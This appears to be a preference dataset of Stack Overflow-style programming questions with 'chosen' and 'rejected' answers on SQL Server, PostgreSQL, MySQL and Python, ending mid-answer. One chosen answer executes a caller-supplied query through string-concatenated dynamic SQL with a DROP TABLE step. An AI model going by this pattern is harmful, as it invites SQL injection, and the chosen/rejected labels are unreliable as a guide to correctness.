Prompt | Chosen | Rejected | Title | Tags |
|---|---|---|---|---|
I want to create a SQL table-valued function that will receive a query as a parameter through my API. In my function I want to execute that query. The query will be a SELECT statement.
This is what I have done so far and want to achieve, but it is not the correct way to do so.
```
CREATE FUNCTION CUSTOM_EXPORT_RESULTS (
@query varchar(max),
@guid uniqueidentifier,
@tableName varchar(200))
RETURNS TABLE
AS
RETURN
(
-- Execute query into a table
SELECT *
INTO @tableName
FROM (
EXEC(@query)
)
)
GO
```
Please suggest the correct way! | Try this one -
```
CREATE PROCEDURE dbo.sp_CUSTOM_EXPORT_RESULTS
@query NVARCHAR(MAX) = 'SELECT * FROM dbo.test'
, @guid UNIQUEIDENTIFIER
, @tableName VARCHAR(200) = 'test2'
AS BEGIN
SELECT @query =
REPLACE(@query,
'FROM',
'INTO [' + @tableName + '] FROM')
DECLARE @SQL NVARCHAR(MAX)
SELECT @SQL = '
IF OBJECT_ID (N''' + @tableName + ''') IS NOT NULL
DROP TABLE [' + @tableName + ']
' + @query
PRINT @SQL
EXEC sys.sp_executesql @SQL
RETURN 0
END
GO
```
Output -
```
IF OBJECT_ID (N'test2') IS NOT NULL
DROP TABLE [test2]
SELECT * INTO [test2] FROM dbo.test
``` | What I see in your question is encapsulation of:
* taking a dynamic SQL expression
* executing it to fill a parametrized table
Why do you want to have such an encapsulation?
First, this can have a negative impact on your database performance. Please read [this on EXEC() and sp\_executesql()](http://www.sommarskog.se/dynamic_sql.html#Introducing) . I hope your SP won't be called from multiple parts of your application, because this WILL get you into trouble, at least performance-wise.
Another thing is - how and where are you constructing your SQL? Obviously you do it somewhere else, and it seems it's manually created. If we're talking about a contemporary application, there are a lot of OR/M solutions for this, and manual construction of TSQL at runtime should always be avoided if possible. Not to mention that EXEC does not guard you against any form of SQL injection attack. However, if all of this is part of some database administration TSQL bundle, forget this paragraph.
At the end, if you want to simply load a new table from some existing table (or part of it) as a part of some administration task in TSQL, consider issuing a SELECT ... INTO ... This will create a new target table structure for you (omitting indexes and constraints) and copy the data. SELECT INTO will outperform INSERT INTO SELECT because [SELECT INTO gets minimally logged](http://msdn.microsoft.com/en-us/library/ms191244%28v=sql.105%29.aspx).
I hope this will get you (and others) at least a bit on the right track. | Send query as parameter to SQL function | [
"sql",
"sql-server"
] |
I'm writing a simple code to calculate how much change is due, with print statements thrown in to check my values.
```
cost = float(raw_input('How much did your meal cost? > '))
payment = float(raw_input('How much did you pay? > '))
change = (payment - cost)
print change
if change < 0:
print 'You need to pay $%.2f more!' % (-change)
dollars, q, d, n, p = 0, 0, 0, 0, 0
change = float(change*100)
print change
if change> 100:
dollars = int(change/100)
change = change % 100
print change
if change >= 25:
q = int(change/25)
change = change % 25
print change
if change >= 10:
d = int(change/10)
change = change % 10
print change
if change >= 5:
n = int(change/5)
change = change % 5
print change
if change >= 1:
p = int(change/1)
else:
print "why doesn't this work?"
print p
print change
print 'you get %d dollars, %d quarters, %d dimes, %d nickels, and %d pennies!' % (dollars, q, d, n, p)
```
This returns:
```
How much did your meal cost? > 34.34
How much did you pay? > 40
5.66
566.0
66.0
16.0
6.0
1.0
why doesn't this work?
0
1.0
```
I can see that change = 1.0 before and after the pennies calculation, but
```
if change >= 1
```
still reads as false, and goes to the else statement. What's happening here and how can I fix it? | It's exactly as Ignacio says. The easy fix would just be to throw in a line to round change to the second decimal place. Using a function to simplify things a little bit, your code becomes:
```
def get_change_and_coin(coin_amount, change):
change = round(change, 2)
return (change % coin_amount, int(change / coin_amount))
cost = float(raw_input('How much did your meal cost? > '))
payment = float(raw_input('How much did you pay? > '))
change = (payment - cost)
print change
if change < 0:
print 'You need to pay $%.2f more!' % (-change)
dollars, q, d, n, p = 0, 0, 0, 0, 0
dollars = int(change)
change = float(change*100)
(change, q) = get_change_and_coin(25, change)
(change, d) = get_change_and_coin(10, change)
(change, n) = get_change_and_coin(5, change)
(change, p) = get_change_and_coin(1, change)
print 'you get %d dollars, %d quarters, %d dimes, %d nickels, and %d pennies!' % (dollars, q, d, n, p)
```
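For what it's worth, the inaccuracy is easy to reproduce with the exact numbers from the question; this sketch mirrors the dollars/quarters/dimes/nickels modulo chain:

```python
change = 40 - 34.34                          # payment minus cost, as in the question
print(repr(change))                          # slightly less than 5.66
leftover = change * 100 % 100 % 25 % 10 % 5
print(leftover >= 1)                         # False: leftover sits just below 1.0
fixed = round(change * 100) % 100 % 25 % 10 % 5
print(fixed >= 1)                            # True once the cents are rounded first
```

Rounding to whole cents up front (or working in integer cents throughout) sidesteps the binary representation issue entirely.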
Hope this helps! | Welcome to IEEE 754 floating point. Enjoy the [inaccuracies](http://en.wikipedia.org/wiki/Floating_point#Accuracy_problems). Use a fixed-point or integer mechanism if you want to avoid them. | Python code not working - confusion about if statement | [
"python"
] |
I'm trying to figure out how to open up a file and then store its contents into a dictionary using the Part no. as the key and the other information as the value. So I want it to look something like this:
```
{Part no.: "Description,Price", 453: "Sperving_Bearing,9900", 1342: "Panametric_Fan,23400",9480: "Converter_Exchange,93859"}
```
I was able to store the text from the file into a list, but I'm not sure how to assign more than one value to a key. I'm trying to do this without importing any modules. I've been using the basic str methods, list methods and dict methods. | For a `txt` file like so
```
453 Sperving_Bearing 9900
1342 Panametric_Fan 23400
9480 Converter_Exchange 93859
```
You can just do
```
>>> newDict = {}
>>> with open('testFile.txt', 'r') as f:
for line in f:
splitLine = line.split()
newDict[int(splitLine[0])] = ",".join(splitLine[1:])
>>> newDict
{9480: 'Converter_Exchange,93859', 453: 'Sperving_Bearing,9900', 1342: 'Panametric_Fan,23400'}
```
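The same parsing runs fine without a file on disk; here is a sketch with the rows hard-coded as a string, which is handy for testing:

```python
text = """453 Sperving_Bearing 9900
1342 Panametric_Fan 23400
9480 Converter_Exchange 93859"""

new_dict = {}
for line in text.splitlines():
    split_line = line.split()                              # split on whitespace
    new_dict[int(split_line[0])] = ",".join(split_line[1:])
print(new_dict[453])  # Sperving_Bearing,9900
```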
You can get rid of the `----...` line by just checking if `line.startswith('-----')`.
**EDIT** - If you are sure that the first two lines contain the same stuff, then you can just do
```
>>> testDict = {"Part no.": "Description,Price"}
>>> with open('testFile.txt', 'r') as f:
_ = next(f)
_ = next(f)
for line in f:
splitLine = line.split()
testDict[int(splitLine[0])] = ",".join(splitLine[1:])
>>> testDict
{9480: 'Converter_Exchange,93859', 'Part no.': 'Description,Price', 453: 'Sperving_Bearing,9900', 1342: 'Panametric_Fan,23400'}
```
This adds the first line to the `testDict` in the code and skips the first two lines and then continues on as normal. | You can read a file into a list of lines like this:
```
lines = thetextfile.readlines()
```
You can split a single line by spaces using:
```
items = somestring.split()
```
Here's a basic example of how to store a list into a dictionary:
```
>>>mylist = [1, 2, 3]
>>>mydict = {}
>>>mydict['hello'] = mylist
>>>mydict['world'] = [4,5,6]
>>>print(mydict)
```
Containers like a tuple, list and dictionary can be nested into each other as their items.
To iterate over a list you can use a for statement like this:
```
for item in somelist:
# do something with the item like printing it
print item
``` | How to read and store values from a text file into a dictionary. [python] | [
"python",
"string",
"list",
"dictionary",
"io"
] |
For a plot that I am making, I have:
```
plt.suptitle('Name:{0}, MJD:{1}, std dev > {2}'.format(pname, mjd[i], rmslevel), fontsize=12, fontweight='bold')
```
I want the number that will appear in the place of {2} (aka rmslevel) to only show 2 decimal places.
I have seen similar questions to this of course, and the solutions:
```
print "%.1f" % number
```
But I can't figure out how to get this to work in the context of the .format things that I have going on in the same line.
Thank you! | You're looking for this.
```
>>> "{0:.2f}".format(123.678956) # Or "{:.2f}".format(123.678956)
'123.68'
```
Your code now turns to
```
plt.suptitle('Name:{0}, MJD:{1}, std dev > {2:.2f}'.format(pname, mjd[i], rmslevel), fontsize=12, fontweight='bold')
```
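A few more format-spec variations in the same spirit (a sketch; the part after the `:` is the format spec, which also accepts width and padding):

```python
value = 3.14159
print("{:.2f}".format(value))      # '3.14'  -- two decimal places
print("{:08.3f}".format(value))    # '0003.142' -- zero-padded to width 8
old_style = "%07.2f" % value       # the old %-formatting equivalent
new_style = "{:07.2f}".format(value)
print(old_style == new_style)      # True
```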
You may find [this](http://docs.python.org/2/library/string.html#formatspec) useful.
[Python Docs](http://docs.python.org/2/library/string.html#formatexamples) contain some examples.
> In most of the cases the syntax is similar to the old %-formatting,
> with the addition of the {} and with : used instead of %. For example,
> '%03.2f' can be translated to '{:03.2f}'. | Maybe you can do this -
```
plt.suptitle('Name:{0}, MJD:{1}, std dev > {2}'.format(
pname, mjd[i], ("%.2f" % rmslevel)
), fontsize=12, fontweight='bold')
``` | limit plot title to only show a certain number of decimal places | [
"python"
] |
I am new to Python and working on a few programs to get the hang of it.
I am making a palindrome program which takes input from a file and prints out the words that are palindromes. Here is the code I have so far:
```
def isPalindrome(word):
if len(word) < 1:
return True
else:
if word[0] == word[-1]:
return isPalindrome(word[1:-1])
else:
return False
def fileInput(filename):
file = open(filename,'r')
fileContent = file.readlines()
if(isPalindrome(fileContent)):
print(fileContent)
else:
print("No palindromes found")
file.close()
```
this is the file
```
moom
mam
madam
dog
cat
bat
```
I get an output of "no palindromes found". | The contents of the file will be read in as a list, so fileContent will end up as:
```
fileContent = file.readlines()
fileContent => ["moom\n", "mam\n", "madam\n", "dog\n", "cat\n", "bat\n"]
```
you could fix this by:
```
def fileInput(filename):
palindromes = False
for line in open(filename):
if isPalindrome(line.strip()):
palindromes = True
print(line.strip(), " is a palindrome.")
return "palindromes found in {}".format(filename) if palindromes else "no palindromes found."
```
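If recursion isn't required, a slice-based check does the same job in one line; this sketch also shows why stripping the newline matters:

```python
def is_palindrome(word):
    word = word.strip()           # drop the trailing newline first
    return word == word[::-1]     # a palindrome reads the same reversed

words = ["moom\n", "mam\n", "madam\n", "dog\n", "cat\n", "bat\n"]
print([w.strip() for w in words if is_palindrome(w)])  # ['moom', 'mam', 'madam']
print("madam\n" == "madam\n"[::-1])                    # False without stripping
```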
Note: I have added the `palindromes` flag for the purposes of returning the final "palindromes [not] found" statement. | There should be a loop over the words in the file. Also, `readlines` keeps the end-of-line characters. You should `strip` them before calling isPalindrome. | Palindrome program in python using file i/o | [
"python",
"python-3.x"
] |
I have a 60GB SciPy Array (Matrix) I must share between 5+ `multiprocessing` `Process` objects. I've seen numpy-sharedmem and read [this discussion](http://grokbase.com/t/python/python-list/1144s75ps4/multiprocessing-shared-memory-vs-pickled-copies) on the SciPy list. There seem to be two approaches--`numpy-sharedmem` and using a `multiprocessing.RawArray()` and mapping NumPy `dtype`s to `ctype`s. Now, `numpy-sharedmem` seems to be the way to go, but I've yet to see a good reference example. I don't need any kind of locks, since the array (actually a matrix) will be read-only. Now, due to its size, I'd like to avoid a copy. It *sounds like* the correct method is to create the *only* copy of the array as a `sharedmem` array, and then pass it to the `Process` objects? A couple of specific questions:
1. What's the best way to actually pass the sharedmem handles to sub-`Process()`es? Do I need a queue just to pass one array around? Would a pipe be better? Can I just pass it as an argument to the `Process()` subclass's init (where I'm assuming it's pickled)?
2. In the discussion I linked above, there's mention of `numpy-sharedmem` not being 64bit-safe? I'm definitely using some structures that aren't 32-bit addressable.
3. Are there tradeoff's to the `RawArray()` approach? Slower, buggier?
4. Do I need any ctype-to-dtype mapping for the numpy-sharedmem method?
5. Does anyone have an example of some OpenSource code doing this? I'm a very hands-on learner, and it's hard to get this working without any kind of good example to look at.
If there's any additional info I can provide to help clarify this for others, please comment and I'll add. Thanks!
This needs to run on Ubuntu Linux and *Maybe* Mac OS, but portability isn't a huge concern. | @Velimir Mlaker gave a great answer. I thought I could add some bits of comments and a tiny example.
(I couldn't find much documentation on sharedmem - these are the results of my own experiments.)
1. Do you need to pass the handles when the subprocess is starting, or after it has started? If it's just the former, you can just use the `target` and `args` arguments for `Process`. This is potentially better than using a global variable.
2. From the discussion page you linked, it appears that support for 64-bit Linux was added to sharedmem a while back, so it could be a non-issue.
3. I don't know about this one.
4. No. Refer to example below.
### Example
```
#!/usr/bin/env python
from multiprocessing import Process
import sharedmem
import numpy
def do_work(data, start):
data[start] = 0;
def split_work(num):
n = 20
width = n/num
shared = sharedmem.empty(n)
shared[:] = numpy.random.rand(1, n)[0]
print "values are %s" % shared
processes = [Process(target=do_work, args=(shared, i*width)) for i in xrange(num)]
for p in processes:
p.start()
for p in processes:
p.join()
print "values are %s" % shared
print "type is %s" % type(shared[0])
if __name__ == '__main__':
split_work(4)
```
### Output
```
values are [ 0.81397784 0.59667692 0.10761908 0.6736734 0.46349645 0.98340718
0.44056863 0.10701816 0.67167752 0.29158274 0.22242552 0.14273156
0.34912309 0.43812636 0.58484507 0.81697513 0.57758441 0.4284959
0.7292129 0.06063283]
values are [ 0. 0.59667692 0.10761908 0.6736734 0.46349645 0.
0.44056863 0.10701816 0.67167752 0.29158274 0. 0.14273156
0.34912309 0.43812636 0.58484507 0. 0.57758441 0.4284959
0.7292129 0.06063283]
type is <type 'numpy.float64'>
```
This [related question](https://stackoverflow.com/questions/7894791/use-numpy-array-in-shared-memory-for-multiprocessing) might be useful. | If you are on Linux (or any POSIX-compliant system), you can define this array as a global variable. `multiprocessing` is using `fork()` on Linux when it starts a new child process. A newly spawned child process automatically shares the memory with its parent as long as it does not change it ([copy-on-write](http://en.wikipedia.org/wiki/Copy-on-write) mechanism).
Since you are saying "I don't need any kind of locks, since the array (actually a matrix) will be read-only" taking advantage of this behavior would be a very simple and yet extremely efficient approach: all child processes will access the same data in physical memory when reading this large numpy array.
Don't hand your array to the `Process()` constructor, this will instruct `multiprocessing` to `pickle` the data to the child, which would be extremely inefficient or impossible in your case. On Linux, right after `fork()` the child is an exact copy of the parent using the same physical memory, so all you need to do is making sure that the Python variable 'containing' the matrix is accessible from within the `target` function that you hand over to `Process()`. This you can typically achieve with a 'global' variable.
Example code:
```
from multiprocessing import Process
from numpy import random
global_array = random.random(10**4)
def child():
print sum(global_array)
def main():
processes = [Process(target=child) for _ in xrange(10)]
for p in processes:
p.start()
for p in processes:
p.join()
if __name__ == "__main__":
main()
```
On Windows -- which does not support `fork()` -- `multiprocessing` is using the win32 API call `CreateProcess`. It creates an entirely new process from any given executable. That's why on Windows one is *required* to pickle data to the child if one needs data that has been created during runtime of the parent. | Share Large, Read-Only Numpy Array Between Multiprocessing Processes | [
"python",
"numpy",
"multiprocessing",
"shared-memory"
] |
Given a Users table like so:
Users: id, created\_at
How can I get the # of users created grouped by day? My goal is to see the number of users created this Monday versus previous Monday's. | If `created_at` is of type `timestamp`, the simplest and fastest way is a plain cast to `date`:
```
SELECT created_at::date AS day, count(*) AS ct
FROM users
GROUP BY 1;
```
Since I am assuming that `id` cannot be `NULL`, `count(*)` is a tiny bit shorter and faster than `count(id)`, while doing the same.
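The grouping is easy to sanity-check against an in-memory SQLite database (a sketch with made-up rows; SQLite's `date()` function plays the role of the PostgreSQL `::date` cast):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, created_at TEXT)")
conn.executemany(
    "INSERT INTO users (created_at) VALUES (?)",
    [("2013-07-22 09:00:00",), ("2013-07-22 17:30:00",), ("2013-07-23 08:15:00",)],
)
rows = conn.execute(
    "SELECT date(created_at) AS day, count(*) AS ct "
    "FROM users GROUP BY date(created_at) ORDER BY day"
).fetchall()
print(rows)  # [('2013-07-22', 2), ('2013-07-23', 1)]
```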
If you just want to see days since **"last Monday"**:
```
SELECT created_at::date, count(*) AS ct
FROM users
WHERE created_at >= (now()::date - (EXTRACT(ISODOW FROM now())::int + 6))
GROUP BY 1
ORDER BY 1;
```
This is carefully drafted to use a [sargable](http://en.wikipedia.org/wiki/Sargable) condition, so it can use a simple index on `created_at` if present.
Consider the manual for [`EXTRACT`](http://www.postgresql.org/docs/current/interactive/functions-datetime.html#FUNCTIONS-DATETIME-EXTRACT). | ```
SELECT COUNT(id) AS cnt, EXTRACT(DOW FROM created_at) AS dow
FROM Users
GROUP BY EXTRACT(DAY FROM created_at)
``` | SQL grouping user count by Mondays | [
"sql",
"postgresql"
] |
I work in a small company which is running MS SQL Server 2005.
Now our head office is asking me to provide a backup of the whole database, with the table schema, in a single \*.sql file.
Please help me to back up my database into a \*.sql file including the table schema.
Thanks in advance. | Use SQL Server Management Studio
1. right click on your database and choose `Generate scripts...` and hit `Next`
2. choose `Script entire database and all database objects` and hit `Next`
3. choose `Save to file` and enter a path and a file name for your future sql script file. On the same screen choose `Advanced` and change the `Types of data to script` property value from `Schema only` to `Schema and data`. Hit `OK`. Hit `Next`.
4. and hit `Next` again.
*You can [download](http://www.microsoft.com/en-us/download/details.aspx?id=29062), install, and use SQL Server Management Studio that comes free with Microsoft® SQL Server® 2012 Express* for that | I would go out and download Microsoft SQL Server Management Studio Express.
<http://www.microsoft.com/en-us/download/details.aspx?id=8961>
It is free. You will be able to connect to the database, drill down into Databases, right click and under Tasks, pick Backup Database. Make sure you pick Full... Choose Disk as the place you want to write it to and Execute... Look through your options as well...
Hope this helps! | Microsoft SQL Server 2005 backup the database in *.sql | [
"sql",
"sql-server"
] |
I would like to sort the values of a dictionary (which are lists) based on one of the lists. For example say I have the dictionary:
```
data = {'AttrA':[2,4,1,3],'AttrB':[12,43,23,25],'AttrC':['a','d','f','z']}
```
and I would like to sort this based on the values associated with AttrA, such that:
```
data = {'AttrA':[1,2,3,4],'AttrB':[23,12,25,43],'AttrC':['f','a','z','d']}
```
Thank you in advance! | Sort each value in your dictionary based on the `data['AttrA']` source list, using `sorted()` and `zip()`, all in just 3 lines of code:
```
base = data['AttrA'] # keep a reference to the original sort order
for key in data:
data[key] = [x for (y,x) in sorted(zip(base, data[key]))]
```
Demo:
```
>>> data = {'AttrA': [2, 4, 1, 3], 'AttrB': [12, 43, 23, 25], 'AttrC': ['a', 'd', 'f', 'z']}
>>> base = data['AttrA']
>>> for key in data:
... data[key] = [x for (y,x) in sorted(zip(base, data[key]))]
...
>>> data
{'AttrB': [23, 12, 25, 43], 'AttrC': ['f', 'a', 'z', 'd'], 'AttrA': [1, 2, 3, 4]}
``` | ```
from operator import itemgetter
data = {'AttrA':[2,4,1,3],'AttrB':[12,43,23,25],'AttrC':['a','d','f','z']}
sort = itemgetter(*[i for i, v in sorted(enumerate(data['AttrA']), key=itemgetter(1))])
data = dict((k, list(sort(v))) for k, v in data.items())
```
Or a shorter but less efficient method of creating `sort`:
```
sort = itemgetter(*[data['AttrA'].index(v) for v in sorted(data['AttrA'])])
```
Result:
```
>>> data
{'AttrB': [23, 12, 25, 43], 'AttrC': ['f', 'a', 'z', 'd'], 'AttrA': [1, 2, 3, 4]}
```
This uses [`operator.itemgetter`](http://docs.python.org/2/library/operator.html#operator.itemgetter) to create a sorting function that grabs items from a sequence in the order determined by `data['AttrA']`, and then applying that sorting function to each value in the dictionary. | Sorting values of a dictionary based on a list | [
"python",
"sorting",
"dictionary"
] |
I am unable to solve this loop structure problem in SQL. I have two DATETIME parameters: `@Departure` and `@Arrival`, and I am adding `NumberofHaltHrs`. I need to get the looping of `@Departure` and `@Arrival` as below.
Let's say I have
```
@Departure= 13/01/01 00:00:00(YY/MM/DD) and
@Arrival= 13/01/10 02:00:00(YY/MM/DD)
NumofHaltHrs are like 2, 22, 26, 56 (this is a column of another table which I need to add to the result table)
```
Desired output:
```
@Departure @Arrival
13/01/01 00:00:00 13/01/01 02:00:00 //Adding NumOfHaltHrs (2Hrs )
13/01/01 02:00:00 13/01/02 00:00:00 //NumOfHaltHrs (22 Hrs)
13/01/02 00:00:00 13/01/03 02:00:00
13/01/03 02:00:00 13/01/05 08:00:00
13/01/05 08:00:00 ...
...
```
I need to insert @Departure,@Arrival,NumOfHaltHrs into Result Table where its structure is
```
JourneyDetailsTable: (JourneyID,HaltID,Departure,Arrival,NumOfHaltHrs)
Halt : HaltID,NumOfHaltDays
```
I tried looping but I could not get the Arrival dates in the Departure column. | **[Here is the SQLFiddle Demo](http://sqlfiddle.com/#!3/fb036/1)**
**Below is the Query :**
```
create table Halts (id int,NoOfHalts int)
Go
insert into halts values(1,2),(2,22),(3,2),(4,22)
Go
select DATEADD(hour,
T.sum - T.NoofHalts,
Convert(datetime,'23/07/2012 00:00:00',103)) as Deaprture,
DATEADD(hour,
T.sum,
Convert(datetime,'23/07/2012 00:00:00',103)) as Arrival ,NoofHalts
from (select top (select COUNT(*) from Halts)
t1.id,
t1.NoOfHalts,
SUM(t2.NoOfHalts) as sum
from Halts t1
inner join Halts t2 on t1.id >= t2.id
group by t1.id, t1.NoOfHalts
order by t1.id
) T
```
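The self-join in the subquery is just building a running total of halt hours; the same leg arithmetic, sketched in Python with the dates and halt values from the question, shows the intent:

```python
from itertools import accumulate
from datetime import datetime, timedelta

halts = [2, 22, 26, 56]               # the NumOfHaltHrs values
start = datetime(2013, 1, 1)          # the @Departure parameter
legs = []
for halt, total in zip(halts, accumulate(halts)):
    leg_departure = start + timedelta(hours=total - halt)
    leg_arrival = start + timedelta(hours=total)
    legs.append((leg_departure, leg_arrival))
for leg in legs:
    print(leg)  # first leg: 2013-01-01 00:00 -> 2013-01-01 02:00
```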
Add the number-of-halts entries which you want in the output to the `Halts` table. | Try this:
```
DECLARE @Departure DATETIME
SET
@Departure = '01/13/01 00:00:00'
CREATE TABLE #NumofHaltHrs(HaltTime INT, ID INT IDENTITY(1,1))
INSERT INTO #NumofHaltHrs
(HaltTime)
VALUES
(2)
INSERT INTO #NumofHaltHrs
(HaltTime)
VALUES
(22)
INSERT INTO #NumofHaltHrs
(HaltTime)
VALUES
(26)
INSERT INTO #NumofHaltHrs
(HaltTime)
VALUES
(56)
DECLARE @UpdatedArrivalTime DATETIME, @NumberOfHaltRows INT, @NumberOfHaltRowsIndex INT
SET @UpdatedArrivalTime = @Departure
SET @NumberOfHaltRowsIndex = 1
SELECT
@NumberOfHaltRows = COUNT(ID)
FROM #NumofHaltHrs
CREATE TABLE #Schedule(DEPARTURE DATETIME, ARRIVAL DATETIME)
WHILE @NumberOfHaltRowsIndex <= @NumberOfHaltRows
BEGIN
DECLARE @HaltTime INT
SELECT
@HaltTime = HaltTime
FROM #NumofHaltHrs
WHERE ID = @NumberOfHaltRowsIndex
INSERT INTO #Schedule
VALUES
(@UpdatedArrivalTime, DATEADD(hour, @HaltTime, @UpdatedArrivalTime))
SET @UpdatedArrivalTime = DATEADD(hour, @HaltTime, @UpdatedArrivalTime)
SET @NumberOfHaltRowsIndex = @NumberOfHaltRowsIndex + 1
END
SELECT * FROM #Schedule
```
I don't know in which scenario you want to use it, so kindly check for performance if the data is huge. | Repetition of column values in next row, using SQL | [
"sql",
"sql-server",
"sql-server-2008"
] |
Consider the following example query:
```
SELECT foo.bar,
DATEDIFF(
# Some more advanced logic, such as IF(,,), which shouldn't be copy pasted
) as bazValue
FROM foo
WHERE bazValue >= CURDATE() # <-- This doesn't work
```
How can I make the `bazValue` available later on in the query? I'd prefer this, since I believe that it's enough to maintain the code in one place if possible. | There are a couple of ways around this problem that you can use in MySQL:
By using an inline view (this should work in most other versions of SQL, too):
```
select * from
(SELECT foo.bar,
DATEDIFF(
# Some more advanced logic, such as IF(,,), which shouldn't be copy pasted
) as bazValue
FROM foo) buz
WHERE bazValue >= CURDATE()
```
By using a HAVING clause (using column aliases in HAVING clauses is specific to MySQL):
```
SELECT foo.bar,
DATEDIFF(
# Some more advanced logic, such as IF(,,), which shouldn't be copy pasted
) as bazValue
FROM foo
HAVING bazValue >= CURDATE()
``` | As documented under [Problems with Column Aliases](http://dev.mysql.com/doc/en/problems-with-alias.html):
> Standard SQL disallows references to column aliases in a `WHERE` clause. This restriction is imposed because when the `WHERE` clause is evaluated, the column value may not yet have been determined. For example, the following query is illegal:
>
> ```
> SELECT id, COUNT(*) AS cnt FROM tbl_name
> WHERE cnt > 0 GROUP BY id;
> ```
>
> The `WHERE` clause determines which rows should be included in the `GROUP BY` clause, but it refers to the alias of a column value that is not known until after the rows have been selected, and grouped by the `GROUP BY`.
You can however reuse the aliased expression, and if it uses deterministic functions the query optimiser will ensure that cached results are reused:
```
SELECT foo.bar,
DATEDIFF(
-- your arguments
) as bazValue
FROM foo
WHERE DATEDIFF(
-- your arguments
) >= CURDATE()
```
Alternatively, you can move the filter into a `HAVING` clause (where aliased columns will already have been calculated and are therefore available) - but performance will suffer as indexes cannot be used and the filter will not be applied until after results have been compiled. | Using AS value in later on in query | [
"mysql",
"sql"
] |
In Python how can I write a generic function to generate the Cartesian product of the same set repeated n times without using recursion and without using the itertools package? The function should take two parameters: the set and the n times.
e.g.:
```
set1={'a','b'}
print({(x,y) for x in set1 for y in set1})
{('a', 'b'), ('b', 'a'), ('b', 'b'), ('a', 'a')}
print({(x,y,z) for x in set1 for y in set1 for z in set1})
{('b', 'a', 'b'), ('a', 'b', 'a'), ('a', 'a', 'a'), ('b', 'a', 'a'), ('a', 'a', 'b'), ('b', 'b', 'a'), ('b', 'b', 'b'), ('a', 'b', 'b')}
```
etc.
But also:
```
set2={'a','b','c'}
print({(x,y,z) for x in set2 for y in set2 for z in set2})
print({(w,x,y,z) for w in set2 for x in set2 for y in set2 for z in set2})
```
etc. | You can generalize the comprehension-based technique you're already using by iteratively building up the result:
```
def cartesian_product(s, dim):
if dim == 0:
return set()
res = [(e,) for e in s]
for i in range(dim - 1):
res = [e + (f,) for e in res for f in s]
return set(res)
ex = {1,2,3}
for i in range(4):
print cartesian_product(ex, i)
```
Output:
```
set([])
set([(2,), (3,), (1,)])
set([(1, 2), (3, 2), (1, 3), (3, 3), (3, 1), (2, 1), (2, 3), (2, 2), (1, 1)])
set([(1, 3, 2), (1, 3, 1), (3, 3, 1), (2, 3, 1), (3, 3, 3), (2, 3, 2), (3, 3, 2), (2, 3, 3), (3, 2, 2), (3, 1, 3), (3, 2, 3), (3, 1, 2), (1, 2, 1), (3, 1, 1), (3, 2, 1), (1, 2, 2), (1, 2, 3), (1, 1, 1), (2, 1, 2), (2, 2, 3), (2, 1, 3), (2, 2, 2), (2, 2, 1), (2, 1, 1), (1, 1, 2), (1, 1, 3), (1, 3, 3)])
``` | ```
def cartesian(A,n):
tmp1,tmp2 = [],[[]]
for k in range(n):
for i in A:
tmp1.extend([j+[i] for j in tmp2])
tmp1,tmp2 = [],tmp1
return tmp2
[In:1] A = [1,2,3] ; n = 1
[Out:1] [[1], [2], [3]]
[In:2] A = [1,2,3] ; n = 4
[Out:2] [[1, 1, 1], [2, 1, 1], [3, 1, 1], [1, 2, 1], [2, 2, 1], [3, 2, 1], [1, 3, 1],
[2, 3, 1], [3, 3, 1], [1, 1, 2], [2, 1, 2], [3, 1, 2], [1, 2, 2], [2, 2, 2],
[3, 2, 2], [1, 3, 2], [2, 3, 2], [3, 3, 2], [1, 1, 3], [2, 1, 3], [3, 1, 3],
[1, 2, 3], [2, 2, 3], [3, 2, 3], [1, 3, 3], [2, 3, 3], [3, 3, 3]]
``` | Cartesian product generic function in Python | [
"python",
"for-loop",
"set",
"cartesian-product"
] |
having trouble with a multi-table query today. I tried writing it myself and it didn't seem to work, so I selected all of the columns in the Management Studio Design view. The code SHOULD work but alas it doesn't. If I run this query, it seems to just keep going and going. I left my desk for a minute and when I came back and stopped the query, it had returned something like 2,000,000 rows (there are only about 120,000 in the PODetail table!!):
```
SELECT PODetail.OrderNum, PODetail.VendorNum, vw_orderHistory.Weight, vw_orderHistory.StdSqft, vw_orderHistory.ReqDate, vw_orderHistory.City,
vw_orderHistory.State, FB_FreightVend.Miles, FB_FreightVend.RateperLoad
FROM PODetail CROSS JOIN
vw_orderHistory CROSS JOIN
FB_FreightVend
ORDER BY ReqDate
```
Not only that, but it seems that every record had an OrderNum of 0 which shouldn't be the case. So I tried to exclude it...
```
SELECT PODetail.OrderNum, PODetail.VendorNum, vw_orderHistory.Weight, vw_orderHistory.StdSqft, vw_orderHistory.ReqDate, vw_orderHistory.City,
vw_orderHistory.State, FB_FreightVend.Miles, FB_FreightVend.RateperLoad
FROM PODetail CROSS JOIN
vw_orderHistory CROSS JOIN
FB_FreightVend
WHERE PODetail.OrderNum <> 0
ORDER BY ReqDate
```
While it executes successfully (no errors), it also returns no records whatsoever. What's going on here? I'm also curious about the query's CROSS JOIN. When I tried writing this myself, I first used "WHERE PODetail.OrderNum = vw\_orderHistory.OrderNum" to join those tables but I got the same no results issue. When I tried using JOIN, I got errors regarding "multi-part identifier could not be bound." | A `cross join` returns a zillion records. The product of the number of records in each table . . . That might be 10,000 \* 100,000 \* 100 -- this is a big number.
The one caveat is when a table is empty. Then the row count for that table is 0 . . . and 0 times anything is 0. So no rows are returned. And no rows might be returned quite quickly.
I think you need to learn what `join` really does in SQL. Then you need to reimplement this with the correct join conditions. Not only will the query run faster, but it will return accurate results. | Do not use cross joins especially on large tables. The link below will help.
<http://www.codinghorror.com/blog/2007/10/a-visual-explanation-of-sql-joins.html>
Also, **multi-part identifier could not be bound** means the column might not exist as defined. Verify that the column exists, its datatype, and its assigned name for the join.
With the condition <> 0, all non-corresponding values from PODetail will be omitted.
Use (Ordernumber <> 0 or Ordernumber is null) | SQL query either runs endlessly or returns no values | [
"sql",
"sql-server"
] |
So I have a line of text like this getting read into my program:
```
00001740 n 3 eintiteas aonán beith 003 @ 00001930 n 0000 ~ 00002137 n 0000 ~ 04424418 n 0000
```
And I want to split that in two at the first special character. Most of the time the line is split by the '@' symbol, but in some cases a different character comes up. ('~', '+', '#p', '#m', '%p', '=').
So far I have it working for the '@' character:
```
def split_pointer_part(self, line):
self.before_at, self.after_at = line.partition('@')[::2]
return self.before_at, self.after_at
```
How do I change this to work for the first one that shows up out of the list of special characters? | You can use a regular expression:
```
>>> import re
>>> line = "00001740 n 3 eintiteas aonán beith 003 @ 00001930 n 0000 ~ 00002137 n 0000 ~ 04424418 n 0000"
>>> re.split(r'(?:#p|#m|%p|[@~+=])', line, 1)
